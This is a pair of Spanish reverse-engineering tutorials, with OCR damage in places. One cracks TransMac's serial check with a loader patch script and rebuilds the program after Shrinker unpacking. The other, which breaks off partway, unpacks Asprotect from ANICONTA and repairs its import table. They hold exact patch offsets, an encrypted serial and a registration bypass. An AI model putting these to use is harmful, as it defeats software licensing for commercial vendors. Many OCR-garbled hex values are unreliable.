:0040D8C4 8A0DD9A 14200 mov cl, byte ptr [0042A1D9] -> El sexto caracter. 
:0040D8CA 83E1FO0 and ecx, FFEEFEFO -> ¡Toma ya! 

:0040D8CD 80F990 cmp cl, 90 -> No hay otra alternativa. 

:0040D8D0 OF85EA000000 jne 0040D9C0 


Parece que tenemos clara la cosa, según el fragmento código anterior las comparaciones son sobre el 4%, 19, 3%, 7* y 6? 
caracter encriptado. El cuarto valor encriptado tiene que ser 00 si no en el CALL 0040C8C0 se comprueba el 8” caracter 
del Serial sin encriptar y luego se preparan las llamadas a GetLocalTime para la comprobación de los 60 días. Hemos 
tenido suerte ya que, si bien el cuarto caracter no es 00 la encriptación nos ha dejado 5F y este es mayor que 38, con lo 
que el salto en 40D87D no se ha producido. En el caso contrario el JL 0040D9C0 nos hubiera mandado fuera 
directamente con lo que el BPM en 42A1D4 no habría sido efectivo. 


Si el primer valor no es igual a AS se compara con un valor que ha obtenido de la manipulación de los caracteres que 
componen el Nombre (D2 para ARKANIAN). Dado que los valores con los cuales se comparan están en 425C78 y 
siguientes, el Serial bueno encriptado tiene que ser AS XX 46 00 XX ?? 52. O en el caso de que partamos del Nombre, 
D2 XX 46 00 XX ?? 52. 


El sexto caracter se manipula directamente y tiene que dar 90. ¿Y que mejor que un 90 para hacer un AND [90], 
FFFFFFFO y nos dé como resultado 907. El resto de caracteres los ponemos a 00, el Serial nos quedaría de la siguiente 
forma, [D2-A5] 00 46 00 00 90 52. Cambiamos a mano los valores de 42A1D4 y probamos... todo parece correcto. 


Parece que no hay una ventana de "Gracias por registrarse" ni nada parecido, aceptamos el contrato de Licencia y 
vamos al About a ver que dice, sorprendentemente saltamos al Sice de nuevo, parece que se va a comprobar de nuevo el 
Serial en 42A1D4. No hemos quitado el BPM ¿recuerdas?. 


Las comprobaciones se suceden tres veces con el mismo código de arriba en 40DADD, 40DBBA y 40D883 de nuevo, 
como hemos parcheado en memoria no vamos a tener ningún problema. 


¿Por qué hace el programa esto?, pues para mostrarnos la ventana adecuada, si el Serial no es correcto nos muestra otra 
vez el contrato de Licencia con un encabezado de Unregistered y si es correcto, como en este caso, nos muestra otra 
Licencia, con un bonito Registered, donde nos confirman que estamos registrados y que estamos autorizados a disponer 
libremente del programa sin limitaciones. ¿Sin limitaciones?, ¡Gracias!, lo aprovecharemos para la segunda parte. 


Bien, solo nos queda localizar donde se hacen las comprobaciones al iniciar el programa. Dejamos el BPM en su sitio, 
cerramos y volvemos a entrar. El Sice salta cuando "Shrinker 3.algo" va desempakando el programa en esa dirección, un 
FS para aterrizar en 00410FB7 y vemos como el Serial que está en el archivo Transmac.ppp no aparece por ningún lado, 
el valor de 42A1D4 permanece a 00. 


La comprobación del Serial no se produce en este código, si dejamos el bp puesto volvemos a pasar otra vez por la 
secuencia 40D883, 40DADD, 40DBBA y otra vez por 40D883, donde ya aparece nuestro Serial de prueba. 


El código es el mismo de arriba: 


:00410FB7 A0D4A14200 mov al, byte ptr [0042A1D4] 

:00410FBC 8A0D785C4200 mov cl, byte ptr [00425C78] 

:00410FC2 3AC1 cmp al, cl 

:00410FC4 7408 je 0O410FCE -> Modificamos este a JMP en el script. 
:00410FC6 3A05C5A14200 cmp al, byte ptr [0042A1C5] 


Si metemos manualmente el Serial encriptado en 42A1D4 cuando estamos aquí, el programa se abre perfectamente y la 
ventana de Licencia no aparece. Bien, esto nos facilita las cosas para hacer el Loader. 


Podemos hacerlo de dos maneras. Como nos hemos registrado al instalar el programa tenemos en el archivo 
Transmac.ppp nuestro Nombre y un Número de Serie incorrecto, como conocemos el valor asignado a nuestro nombre 
[D2] , el Serial que vamos a utilizar es D2 00 46 00 00 90 52. 


Como no sabemos el tiempo que va a costar descomprimir el programa en memoria, ni cuando se ponen a 00 los valores 
de esa dirección, lo que vamos a hacer es parchear el primer salto de la comprobación en 410FC4 y luego colar el Serial 
en su sitio, también podemos personalizar un poco la ventana del About. Así queda el script: 


¡OK, veamos si funciona. 
¡TransCrack, 22/09/2001 (c) Arkanian. 


F=Transmac.EXE: 
O=TransCrack.EXE: 


P=410FC4/74,08/EB,08: ; Parcheamos la primera comprobación. 

P=42A 1D4/00,00,00,00,00,00,00/(D2-A5],00,46,00,00,90,52: ; Colamos el Serial bueno encriptado. 

P=426B 1D/41,6C,6C,20,52,69,67,68,74,73,20,52,65,73,65,72,76,65,64/43,72,61,63,6B,65,64,20,62,79,20,41,52,4B,41,4E,49,41,4E: 
¡Personalizamos la cosa :-) 

$ ; Fin. 


Otra forma de hacerlo es eliminando el archivo Transmac.ppp, de esta manera no habrá un Usuario previo, es decir el 
valor de 42A1C5 será 00 lo que le indica al programa que no existe un Nombre de Usuario. Para este caso empleamos el 
valor AS como primer caracter del Serial, teneis las dos alternativas resaltadas en azul, elegid la que más os guste, las 
dos funcionan perfectamente y sin ventanas de Licencia molestas al inicio. 


Vamos a la segunda parte. 


PARTE ll 
DESEMPAKANDO Y RECONSTRUYENDO 


Como ya he comentado en la introduccion File InsPEctor XL nos identifica el compilador como Shrinker 3.4 con una 
probabilidad del 66.3%, veamos las secciones del archivo, esto es una imagen tomada de la pestaña Secciones del XL: 


¡shrinkO | 00001000 0003C000 00000000 00000000 CODO0DS2 
(3 .shrink1 | 0003D000 00001000 00007000 00000200 40000042 
 rdatá  0003E000 0000002D O001D600 00000200 40000040 
E data 0003FO0O 0000273C 00000600 00001600 CONODO40 
O idata | 00042000 0000085c 00001C00 ODODOADO | CODOODAD 
E load 00043000 0000307C 00002600 00003200 68040020 
E reloc 00047000 00000614 00005800 00000800 42000040 
ste | 00048000 00001000 00006000 00001000 40000040 


Lo primero que vamos a hacer es cambiar las Características de la sección .shrink0 con el Procdump a E0000020 para 
poder trabajar con Softlce, como dato curioso observamos que automáticamente .shrink0 pasa a .shrink a secas, vemos 
que el Phisical Address y el Phisical Size de dicha sección están a O y también vemos el extraño valor de la sección .load 
donde está el Punto de Entrada al programa. 


Tenemos los siguientes datos del archivo Transmac.exe en nuestro disco duro: 


-. Punto de Entrada (RVA): 0004454F., 


-. Tamaño de la imagen: 00049000. 
-. Image Base: 00400000. 


¿Que ocurre cuando está el programa se está ejecutando?, pues que tenemos esta imagen tomada del Procdump: 


¡Sections Informatiars: 


[Name | VitualSize | VitualDitset_| Rawsize_ | RawOffset_ | Characteristics | 


text 00021350 00001000 00022000 00000100 60000020 
«data 000014D2 00023000 00002000 00028100 40000040 
«data 00012FF4 00025000 00004000 00030100 C0000040 

rsro 0000450 00038000 0005000 00038100 40000040 


¡Hay que joderse!, te juro que es el mismo programa y no solo eso, sino que la opción Process Infos nos da los 
siguientes datos para el proceso Transmac.exe 


-. Punto de Entrada: 0001A627. 
-. Tamaño de la imagen: 0003D000. 
-. Image Base: 00400000. 


Pasemos a Softlce a ver que encontramos. Hacemos un TASK para ver los procesos, identificamos a TRANSMAC y 
acto seguido un MAP32 TRANSMAC. La salida de Softlce nos muestra más o menos lo mismo que el XL y si 
empleamos el PuPE obtenemos un resultado identico al de Procdump. ¿Que está pasando?, ¿Cual es la buena?. 


Vayamos al Loader, si nos trazamos la carga del programa siguiendo los pasos del desempakado manual de Shrinker 3.4 
efectivamente acabamos en un CALL [EBP+24] cuyo valor es 414627. Teóricamente con cambiar 414627 a JMP EIP y 
luego volcar con Procdump tendríamos el programa. Pues no es así, obtenemos un archivo de 184 Kb. que no sirve para 

nada. 


Si intentamos un volcado con Icedump mediante /DUMP 400000 49000 CADUMP.EXE el archivo resultante es basura. 
El tamaño del archivo aumenta hasta 292 Kb., el Punto de Entrada es 414627 y está bien, pero el código no vale para 
nada, la instrucción en 41A627 es un MOVSD seguido de dos POP'S y un RET, identico resultado obtenemos con un 
volcado de XL. 


PuPE es el único que se muestra eficaz en este aspecto (Alinear - Volcar). Nos deja una archivo de 242 Kb que finaliza 
en el offset OOO3C5SAO, el código parece estar correcto y XL nos informa que esta compilado con Visual C++ 6.0. 
Lamentablemente el ejecutable carece de icono y cuando lo arrancamos produce un fallo de página en 004487F6. 


Analizemos la situación, tenemos un archivo volcado (DUMP.EXE 242 Kb) con un Tamaño de imagen de 0003D000 si 
miramos las Secciones con el XL tenemos que .shrink Virtual Size + Virtual Address -> 0003C000 + 00001000 = 
0003D00O0, ¡coño! solo nos deja volcar hasta ahí. Trazando el desempakado de Transmac.exe de nuevo y poniendo los 
bp's adecuados vemos que la sección .shrink, una vez desempakada, tiene su propia cabecera cuyos datos coinciden con 
la información que nos proporcionan Procdump y PuPE. 


El problema reside en la sección .rsrc, a ver si me explico, cuando ejecutamos DUMP.EXE cuyo Tamaño es 0003D000 
se produce un fallo de página en la dirección 004487F6 si le restamos la Image Base nos queda 000487F6 . Esto es un 
rango de direcciónes que no hemos podido volcar y que corresponde a la sección .rsrc del archivo Transmac.exe, es 
decir la sección .rsrc de DUMP.EXE no se usa para nada, el programa está buscando direcciones por encima de 
00448000 (.rsrc 400000 + 48000) que es justo esa sección en Transmac.exe y que quedan fuera del rango de direcciones 
del volcado. 


Esto lo vamos a solucionar a mano aumentando el tamaño del archivo. Volcamos la sección .rsrc de Transmac.exe con el 
XL, abrimos DUMP.EXE con el editor Hexadecimal, nos situamos al final del archivo e insertamos lo ceros necesarios 
hasta el offset 47FFF , acto seguido abrimos el archivo .rsrc que corresponde a la sección volcada, selecionamos todo, 
copiamos y pegamos en el offset 48000 de DUMP.EXE, guardar y salir. 


Ahora necesitamos modificar la cebecera del archivo para que tenga en cuenta los bytes que hemos insertado. Esto lo 
vamos a hacer con Procdump creando dos nuevas secciones de nombres .cero y .rsrcl (los nombres dan igual, podían 
haber sido cualquier otro) con los siguientes valores: 


Nombre Sección Virtual Size | Virtual Offset Raw Size Raw Offset 
«Cero 0000B000 0003D000 0000B000 0003D000 


| .rsrcl [00001000 [| 00048000 | 00001000 | 00048000 


Sabemos que en los archivos volcados Raw Size = Virtual Size y Raw Offset = Virtual Offset, vemos con el XL que la 
sección .rsrc de Transmac.exe tiene como Virtual Address (Virtual Offset en Procdump) 00048000 y como Virtual Size 
00001000, trasladamos estos datos a Procdump para la sección .rsrcl. 


Para la sección .cero el Raw Offset lo pone automáticamente Procdump y coincide con la Tamaño de la imagen, es decir 
el final de fichero, lo restamos del Virtual Offset de la sección .rsrcl y nos queda el Virtual Size de la sección .cero 
(00048000 - 0003D000 = 0000B000). Para finalizar cambiamos el Size of Image a 00049000 y reconstruimos la 
cabecera, Procdump se lo monta solo y nos deja una sola sección quedando la cosa así: 


Nombre Sección Virtual Size Virtual Offset Raw Size Raw Offset 


| .Cero [00001000 [| 00048000 | 00000ES8 | 0003D000 


Nota: Por alguna razón esto no siempre funciona a la primera, lo he hecho varias veces y los resultados no siempre son 
iguales. Procdump a veces pone el Raw Size de .rsrcl a E88 y deja el RS de .cero a 00, o mezcla los valores de las dos 
secciones. Esto se soluciona borrando la última sección y poniendo los valores de arriba en la sección que quede. 


¡Ya tenemos icono! ...pero el ejecutable sigue sin funcionar, tenemos otro fallo de página en otro lado. Paciencia. Esto 
tiene algo que ver con las Variables de Entorno en unas direcciones OO7JAXXXX, el programa da unas cuantas vueltas 
por aquí y en una de ellas parece como si la dirección se moviera una línea hacia arriba y claro la cosa ya no cuadra, 
donde antes había ceros ahora tenemos algo referente a la tarjeta de sonido. Para no aburriros os dire que esto se 
soluciona haciendo incondicional el salto en 4196DB. 


Los "daños colaterales" no parecen graves, un contrato de Licencia absolutamente ininteligible (códigos ASCU en plan 
raro) y un ejecutable funcional. Como vamos a poner el Serial encriptado "a mano" esto no tiene mucha importancia ya 
que la ventana con la Licencia no nos va a aparecer. Estos son los cambios a realizar con el editor Hex: 


DIRECCION OFFSET VALOR CAMBIAR A 


| :004196DB | 000196DB | 7404 | EB 0A 


:0042A1D4 0002A1D4 00 00 00 00 00 00 00 A5 00 46 00 00 90 52 


Pero el menú About es impresentable ya que la enorme ventana de Licencia parece un volcado de memoria más que otra 
cosa, así que vamos a adornar el programa un poco. 


LA ESTETICA ES IMPORTANTE 


Abrimos el ExeScope y en Resource/Dialog/INTRO encontramos nuestra ventana, empezamos a cambiar cosas, con un 
poco de habilidad y paciencia la enorme ventana de Licencia se puede ver reducida a otra ventana mucho más funcional 
y atractiva como esta: 


¡About TransMac 


Bonito, ¿Eh?. Me ha costado un rato de pruebas en plan ensayo-error dejarla como está arriba. Supongo que se podría 
haber dejado mejor, pero tampoco hay que pasarse. 


FIN 
Lo de siempre, esto es con propositos educativos..., el autor no se hace responsable..., etc.. 


Saludos y hasta otra. 
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ANICONTA V3.1 [ Desempakar Asprotect con OllyDbg ] 


Estudio Realizado por: DGrojo  - 25/09/2002 


Lo primero que desearía agradecer es la acogida de todo el mundo de mi 
primer tutorial sobre Asprotect hecho en Olly. 


Yo también estoy aprendiendo, y por cierto hay mucho que aprender. ] 


Me consta que en aquel tutorial hubo algunas dudas (espero razonables) sobre 
todo lo referente a los offsets, sobre que archivo estaba trabajando, o 
simplemente sobre el funcionamiento de Olly. 

Espero y confíen en mi, que seré capaz de transmitirles de forma aún más 
clara y simple el quit de la cuestión sobre desempacar Asprotect, porque es de 
lo que se trata. 


No quiero enrollarme más, así que simplemente aclarar, qué es lo que se trata 
aquí y que no. 

Se trata de desempacar, descomprimir un programa comprimido en Asprotect 
(que hay muchos) y volcarlo al disco ya descomprimido para su posterior 
estudio. 

Y no, no trate de desproteger el programa en si mismo, sólo de vislumbrar el 
modo de posteriormente analizarlo, eso queda para ustedes (y para servidor de 
tener tiempo ;)) 


La mayor parte del trabajo se realizará con el archivo volcado del original, 
para hacerlo funcionar de igual modo en el que lo hace el original comprimido 
con Asprotect. 


NOTA: Lean los tutoriales de Ricardo Narvaja y de Auspex sobre el tema, ahí 
estará información complementaría que seguro que a mi se me había 
escapado. Sobre todo practiquen. 


Después de toda esta gran pero seguro ya interesante introducción pasemos al 
tema. 


ALEA JACTA EST 


Este tutorial puede ser un poco más peñazo debido al volumen de 
información, pero es simple de entender y realizar, y repito entiendan que 
también estoy aprendiendo.. 


Venga lo de siempre. 
Abrimos el PEID e le cargamos el programa original: 


OEP Module 


A continuación en el menú ejecutamos la opción OEP module, y este será el 
del gráfico 86916C. 


Esto es supuestamente el Original Entry Point (OEP) está en 86916C, como ya 
comenté en su día no nos fiemos para nada. 

Realizamos el método de búsqueda del OEP en Olly, ¿ que no sabemos cual es 
?, pues es bién sencillo, a ver, cargamos el programa original en Olly, 


ejecutamos con F9, entonces generará una excepción de violación de acceso al 
leer FEFEFFFE, que por cierto por si a alguien le interesa lo que hace en dicha 
excepción es ejecutar un manejador de excepciones o SEH que reinicia los 
registros del SICE, con lo que nuestros breakpoints no valdrán para nada. 
Bueno superamos dicha excepción con Mayúsculas + F7 y damos de nuevo 
F9, generará otra y así sucesivamente, alternaremos Mayúsculas+F7 y F9 
hasta que llegada a una excepción al continuar con F9 el programa se ejecuta, 
así que estar atentos a estas direcciones donde va parando, sobre todo la última 
es muy importante. 


Bueno vemos donde para por última vez: 
CPU - main lhuead Ultima excepción en 
¡Esa q: IES2AA6, en la 


instrucción XOR 
[EAX], EAX. 


a 
EX, VEBEOT 


% 
ESOC, OPD PTE 551 1EBP-07 


Así que es momento 
de poner un Break 
Point On Memory 
Access a la sección 
donde está el código, para ello vamos al menú View y Memory o simplemente 
Alt+M, y tenemos esto : 


A Se ve claramente cual es la 
DI A sección de código, ya que 
te en la etiqueta Contains 
indica Code. 

Pulsaríamos el botón 
derecho del ratón y le 
indicamos Set Memory 
Break Point On Access. 

Se ve claramente que 
sección es no? 


! 
] 


JUE TER 
EE 

11F0009 
81397000 
A 

iS 
01040809 
81£40009 


a 


tu o 


, 
DEALIODOIIRILLONIIIIADA 


Vaaaaaale, que soy un plomo, bueno pues ejecutamos y pafff hemos llegado al 
OPP, fijaos en una cosa: 


main thread, module ANICONTA Joladl El OEP no 
SE 'H00 ER A está donde 


dijo PEID en 
86916C, sino 
en 8S6B4FC, 
curioso 
A FS: verdad, ya lo 
DWORD PTR 5 e: LE, Ese a 
al dije no os 
O: A ad | : a. 
CALL A E OMORD PTR DS: [872F04] a 49176] fiels. ) 


no4 Duoko PR DS:1EDX). ERX 


Vale pues vamos al momento importante, al volcado. Una parte del trabajo 
con el archivo original está hecha, encontrar el OEP y parar justo ahí, luego 
vendrá un duro trabajo. 

Como comenté hay que tener cuidado con el programa que se elige para 
volcar a disco, ya avisé que LordPE, ProcDump, dan problemas (vosotros 
mismos), son cómodos pero dan problemas. 

Yo recomiendo usar Ice Dump con SICE o Memory Dumper con Olly, que 
además se las entiende muy bién. 


Necesitasmos un par de datos importantes para volcar a disco, estos son la 
Base de la Imagen y el largo, que cómo los averiguamos, simple, ejecutamos 
el Peditor (se puede hacer con el ProcDump también, o el FilelInspector de 
Viper) por ejemplo y le cargamos el Aniconta original, nos mostrará esto: 


Así que tenemos la base de 
la imagen del archivo 
original donde se cargará 
en memoria que es 400000, 
y el tamaño que ocupará 
esta, que es 

CDF000. 


(Esto lo podéis hacer antes 
de cargar el programa 
original con Olly, poque 
quizá estando en el OEP con 
Olly no podréis ejecutar, 
aviso para no tener que 
repetir, uummm a mi me 
suele pasar xD). 


OK, como estamos en el OEP, y justo en ese momento, abrir el Memory 
Dumper, seleccionar el proceso que esté apuntando al archivo original. 


Seleccionamos el proceso que veis claramente como ANICONTA. 


En Start Location le 
indicamos la base de la 
imagen, y en Byte Count 
le indicamos el tamaño 
de la misma. 


TY Memory Dumper Y1.0 


CMGRCHIVOS DE PROGRSMAICOMMONNAMEN TOOLBARVYENFORM, 
EXARCHIVOS DE PROGRAMAIMEMORY DUMPERIMEMDRYDUMPER E 
CAARCHIVOS DE PROGRAMA MESSENGERIMSMSGS EXE 
CMARCHIVOS DE PROGRAMAWWINAMPYWINAMP EE 

CAARCHIVOS DE PROGRAMAZONE LABS 2ONEALARMIZONEALARM 
COLLYDEGVOLLYDBG. EXE 
EASCANJETPROWPRECISIONSCANPROMHPLAMP EXE 
EXWINDOWSAEXPLORER.EXE 

CNAWINDOWSWLOADOM EXE 
EXWINDOWSARUNDLL exe 
EXWINDOWSWRUNDLLI2 EXE 


Lo ponemos como 
OxVALor, porque lo 
ponemos en 
hexadecimal. 


” 
» - 
—Aetresh Pjocezs List [Download Process Memory To File =] 


- Buftes Detads 


File Name [CWANDOWSE scrtono proyectos áreconta Ániconta_dump uN 
Start Location [0:400000 _— 
Byte Count [isa ou  Pegiter | 


Ca] AS 
Pulsamos sobre Dump Memory, y seleccionamos la ubicación donde 
queremos guardar el archivo descomprimido de Aniconta (llamo 
descomprimido, porque en el OEP Asprotect ha desencriptado ya el código y 


volcado al archivo que generamos en disco de esta descompresión xD, 
dudas?). 


Vale mirad este archivo, no tiene ni icono ni nada, es una basura, hay que 
arreglarlo, esto es porque lo tomamos de memoria, y está desajustado. 
Abrimos de nuevo Peditor, (aquí si que es útil ya que dicha operación la 
realiza en nada y con un simple comando) y cargamos nuestro archivo volcado 
del disco (atentos que y ano se trata del original), damos en el botón 
SECTIONS y nos mostrará lo siguiente, pulsando con el botón derecho dentro 
de la ventana: 


1 ! 
UAB ODDODDOO 
UA SI UL 11 
DOLO HA Y A 


RAW SIZE=VIRTUAL SIZE 
RAW OFFSET=VIRTUAL OFFSET 


Por ser tomidlo de menorna pura austero vn el dis 


Observamos que ahora 
Virtual Size = Raw Size 
y Virtual offset = Raw 


offset. 


o > EA LA DA RAR to — A 
A A A A 
JO a mont mousse chick on a sectiormame hor mote opbons... 


El que ya quiera hacerlo también podéis poner las secciones a E0000020, que 
lo podéis ver arriba el comando y evitamos el truco de antidesensamblado de 
W32DASM y de SICE. 


Miremos la ventana ahora del archivo volcado a disco, no tendréis ya esto ?: 


Todo esto empieza a estar ya más entretenido espero. 

Si ejecutamos nos vamos a pegar una buena, ya que Asprotect lo que suele 
hacer es machacar la Tabla de Importaciones (LAT) del archivo original, y la 
regenera en tiempo de ejecución sobre este ya que tiene cargado en la 
memoria durante el proceso de descompresión el código de Asprotect. 
Como nos otros nos hemos cargado Asprotect, muerto el perro se acabó la 
rabia, pues NO, porque precisamente al no disponer del código original, no 
regeneramos la IAT sobre el archivo volcado cuando lo ejecutamos. 


DOMESTICANDO EL PERRITO 


Ya que disponemos de la utilidad Revirgin hagamos uso de ella, así que por 
un momento sólo por uno olvidémonos de Olly y ejecutemos el programa 
original. 

Ejecutamos Revirgin y seleccionamos el proceso: 


ATT Ya se que no se ve mucho, era para que vieseis que 

pulsando en la pestaña podeis seleccionar el 
proceso, que claramente se ve como Aniconta, junto 
a todos los procesos que ejecuta el sistema en ese 
A momento. 


Cuando lo metemos es curioso pero no nos saca el cartelito ese de Import 
Module no está comprueba el OEP, nos saca esto: 


A Rovirgin by +Tsehp 1.3 public vorsion Os fijáis que en la 
a parte names salen 
dialectos chinos?, y 
qué RVA es CCCO2 
y y ... que no vaya 
que no cuela. xD 


Select Mod.de to Altach 


-—. 
.... 


ds 
apa 
po rs Are 


[pes 7 E Ñ ¡AT Resolver ||! Values + genesatos 


mva  [0cccsz cesar] || Detterazio| [IVA generate! | 
o O a 


A SO 


FP Autole rectiona + 11 paste 
T Mended Scheme — high limi [10000000 


lariconta ene lmpoa Vie—— pon Ed dead 
No se me preocupen se habrá hecho un lío pensando que ha encontrado algo. 
En OEP ponemos el nuestro, pero OJO!, no como 86B4FC (que por cierto 
vaya direccioncita) sino como dirección de disco (yo también soy novato, así 
que imagino que será eso), ya que si ponemos a pelo 86B4FC no funciona 
para nada. 
Lo ponemos como 46B4FC así y damos a Fetch IAT (buscar IAT), tenemos lo 
siguiente: 


RVA = 47A1E0 
Length = 9ES8 


Estos son los datos que sacó Revirgin. 


Os recuerdo que seguimos trabajando con el archivo original, esta vez 


ejecutado por completo. XD 
Nos confundimos de mascota?: 


Venga os explico la forma en la que verifiqué si la IAT es correcta, o mejor 
dicho aparte de verificar la hallamos por nosotros mismos. 

Cargo de nuevo el ejecutable original en Olly, y de nuevo llego al OEP 
(alternando mayúsculas+F7 y F9). 

En la dirección del OEP trazo con F7 hasta llegar a la primera llamada a 
cualquier entrada de la IAT, que será del tipo Jmp Dword Ptr 
DS:[dirección_de_memoria], y que lo sabréis bién porque el Opcode será 
FF25 dir_de memoria al revés. 


Bueno el caso es que llegamos aquí después de trazar nada 3 segundos, ni eso: 


4 
, 


o! 


E 
A 
35 
Ñ 


PTR 05: (98793107 


d309asas 


A 


53 
gigi 


am 


ñ LOs pot E yd 1 
ICÓNTA, 60405600 


24 


y 74 43 
1o>da| 8330 04448700 FF 
, ' cR 


O A EIA 
0S: [008743181:01£81110 


(Dirección donde nos quedamos 408040, y la posición de memoria para el Jmp es 874318) 


En esa instrucción pulsamos el botón derecho del ratón y seleccionamos: 
Follow in Dump -+ Memory Address: 


En la ventana de datos nos mostrará el contenido de la posición de meoria 


87A318, que no es ni más ni menos que 1E81110, lo vemos: 


La ventana de 
e isímnia) E datos fue a la 
orinal ES di dirección que le 
mandamos y 
nos muestra su 
contenido, este 
es 101 1E801, es 
decir IE8I1 10, 
la cual se trata 
de una 
dirección a una 
sección que 
crea Asprotect 
en tiempo de 
ejecución. 


5 BCRISTDO 


IAOOOOA 
Bn 
e  DUAAE 100 


23233388 


roo torta rice IO 


es 
47 €9 
47 68 
47 69 
47 €8 
47 €0 
00 e9 
B7 ES 
eS ES 
88 ES 
88 E> 
Bg ES 
08 ES 
03 E? 
08 E? 
06 ES 
09 ES 
9 ES 
09 E? 
09 E? 
83 ES 
03 E 
99 ES 
B9 ES 
Dn ES 


CcOSooocaaoccaioooo ano 


PP a e o q pub ut o De pu ud bo 0 —. 
Pr rd. rd Jr Jr Jr A, Y Y 


¡SELIRIIIITISIRARRIEIINNAIAGAS 
+6 ADAN > 


6134 08 E3 0 Lógicamente en 
nuestro volcado 


no dispondremos de esa dirección por eso hay que arreglar dichas entradas. 


Bueno pues en la ventana de datos os moveis hacia arriba, hasta encontrar un 
bloque gordo de ceros: 
Veremos esto xD: 


CPU - man thread, module ANICONTA 


PESE 1añasron mos ta Y DELLEPNALAS pia 

FF2E 144233 $ FO PTH CE1127M3 14 A E 

ECU mo ERA, Ef aLSoPar 
Cs11370311) 0170600 
651 1873907 pl . 


mnrconers. | 
El Qi 


ERES 
....o.s.s 
...o.... 
...o..... 


20 00 
20 09 
09 00 
29 08 
Gu 00 
59 0 
29 09 
4 08 
20 

eR 

ze 

0y Da 
28 00 
29 88 
Ds ES 
Ba ES 
Qe ES 
Qs ES 
Qs E> 
05 E9 
Se ES 
es ES 
2 
de ES 


duda acerca de offsets consultad con cualquier calculadora de offsets. 


Buenos pues hemos 
llegado al 
comienzo de la 
IAT, ya que se ve 
claramente el 
bloque de ceros. 
Esta dirección la 
anotamos como 
comienzo de la 
zona IAT y en Olly 
aparece como 
S7AIEO0, ojol xq 
que se trata de una 
dirección de 
memoria no de un 


offset. 


Como offset en 
disco sería 
47AIEO. 


Para cualquier 


Pues bien vemos que este dato coincide con el que sacó Revirgin, ahora toca 
calcular el largo, y se hace en esta misma ventana del mismo modo pero para 


abajo: 


“Jni=J| Aquí vemos que 
el bloque acaba 
en 8S7ABCC. 


Así que sl ¡ hacemos STABCC— 87A1EO0, tenemos DEC como largo, así que 
como Revirgin dos dio 9E8, el sabrá mejor que nosotros,..., es correcto!. 


Bueno pues sabiendo que son buenos los datos del Revirgin, con el archivo 
original cargado en memoria, el OEP como 46B4FC el RVA como 47A1E0 
(recordad que es offset de disco) y la longitud 9E8, damos al botón IAT 
Resolver, teniendo esto: 


Vemos que todas las entradas 
son Redirigidas, hay que 
resolver de nuevo. 


Le damos al botón resolve EVENT y ya tenemos casi la IAT salvo 10 entradas 
sin resolver, que las mostramos poniendo en vez de Show All, Show 
Unresolved. Estas son: 


Tenemos unas 10 
entradas sin 
resolver 
deberemos 
resolver a mano, 
con la ayuda de 
Olly, de la 
intuición y de la 
experiencia. xD 


Venga que ahorta resolver es bién sencillo. 
YA NO NOS DARÁN EL PERRO DEL VECINO 


Yo es una especie de regla personal pero he visto que funciona al 100% de los 
Asprotects que he resuelto de esta versión, fijaos en el tute del Ad Search é 


Replace de Ricardo y seguramente en el de Icon Catcher de Auspex. Si los 
parecidos son tan grandes es casi seguro que así sin hacer mucha parafernalia 
lo resolvais: 


NOTA: Tened a mano mi tute anterior sobre RAM Idle, el tute de Ricardo si 
es posible de Ad SearchéReplace y el tute de Auspex sobre Icon Catcher. 


Primero enumero las entradas (ya digo que es personal cada cual a su modo si 
preferís), agrupando por entradas comunes desde la primera no resuelta, así 
tenemos: 


ENTRADA RVA 
(1) 1ESOCCC 47A234 
(2) 1ESOCCC 47A450 
(3) 1E81110 47A238 
(4) 1€E81110 47A318 
(5) 1€E81110 47A458 
(6) 1E81170 47A24C 
(7) 1E81180 47A3D4 
(8) 1E8112C 47A428 
(9) 1E81164 47A490 
(10) 1E81190 47A49C 


e Para entradas iguales APIS iguales 

e Para la entrada que deje al final del todo en EAX un valor de 87675432 
por ejemplo esa será GetCommandLineA 

e Para la entrada que al final deje en EAX C0000A04, esa será GetVersion 

e El resto casi seguro por no decirlo ya que son falsas, pero lo sugieren el 


que al final EAX devuelve un valor de FFFFFFD por ejemplo o como la 
siete que hace una llamada a [ebp+8] cambiando el valor de EAX, esto 
no es ningún API. 

e Para estas falsas se parchea en el offset donde se realiza la llamada a 
dicha entrada en el archivo volcado por el RETN o RETN4 que indique 
el final de su función correspondiente. 


Las comprobaciones de las entradas falsas deberías comprobarlas en el 
original haciendo lo mismo que si lo hicieseis en el archivo volcado, es decir 
parchear en el offset de la llamada a parchear con el conveniente RETN o 
RETN 4 según proceda. 


Ya comento que esta es una regla que practico en mente después del visto lo 
visto, O sea la experiencia, comprueben ustedes por si mismo el AD Search é 
Replace, el RAM Idle o el Icon Catcher cómo se parecen, si es q hasta mi 
numeración concuerda. 


AVISO que no se trata de un método genérico, ojalá, porque el día que varíe 
la versión o que el número de entradas sin resolver sea de 15, pues qué pasará. 


Las cosas seguiremos comprobando un poco a mano. 


Que que ya sabeis las entradas sin seguir leyendo, cuanto me alegro, xq en 
realidad casi se puede hacer ya. 


Bueno vamos a ver: 


NOTA: Aconsejo mirar mi otro tutorial de RAM Idle, para que comprobeis el 
código de las entradas, os sonarán mucho: 


Entradas 1 y 2: 


NOTA: Todo trabajo sobre Revirgin siempre es referido al archivo original 
del programa ejecutado, salvo el último paso una vez arregladas las entradas 
verdaderas, en el que generaríamos una nueva sección con la IAT reparada 
que se anexaría al archivo descomprimido y volvado que creamos con 
Memory Dumper. 


Veamos el código, del programa original en Olly, para ello deberemos haber 
llegado al OEP con el truco de siempre: 


Una vez aquí en el OEP, el programa está descomprimido y podemos ir a 
nuestras entradas o averiguar también desde donde se llaman, que también 
recomiendo, ya que son llamadas a posiciones de memoria que apuntan a 
dichas entradas, que son direcciones de AsProtect. 


Podemos hacer lo siguiente y ya matamos dos pájaros de un tiro, veréis 
(aunque es opcional): 


Podeis ir directamente aquí a 1ESOCCC o antes averiguar donde está el offset 
de quién lo llama, muy útil cuando debamos parchear las entradas falsas del 
archivo volcado, aunque no imprescindible. XD 


Hacemos Crtl + G, dirección de memoria que apunta a la entrada en la ventana 
de código. Alaaaaa! Y esto que es?, bueno no se me asusten, vemos que en las 
entradas que apuntamos antes teníamos la dirección de la entrada y el RVA 
que almacena esa dirección algo así tal que 474234, vale pues esto es el offset 
de disco, pero necesitamos la dirección de memoria que no es otra que 
87A234. 


Así que después de este rollo, que también me he perdido xD, hacemos 
Crtl+G o botón derecho y GoTo---+ Expresion en la ventana de código a 
87A234, donde aparece una instrucción rara, ni caso, damos botón derecho 
encima de lo que apareció y ejecutamos Find References To----+ Command o 
también Crtl+R, así que saldrá una ventanita indicándonos quién hace 
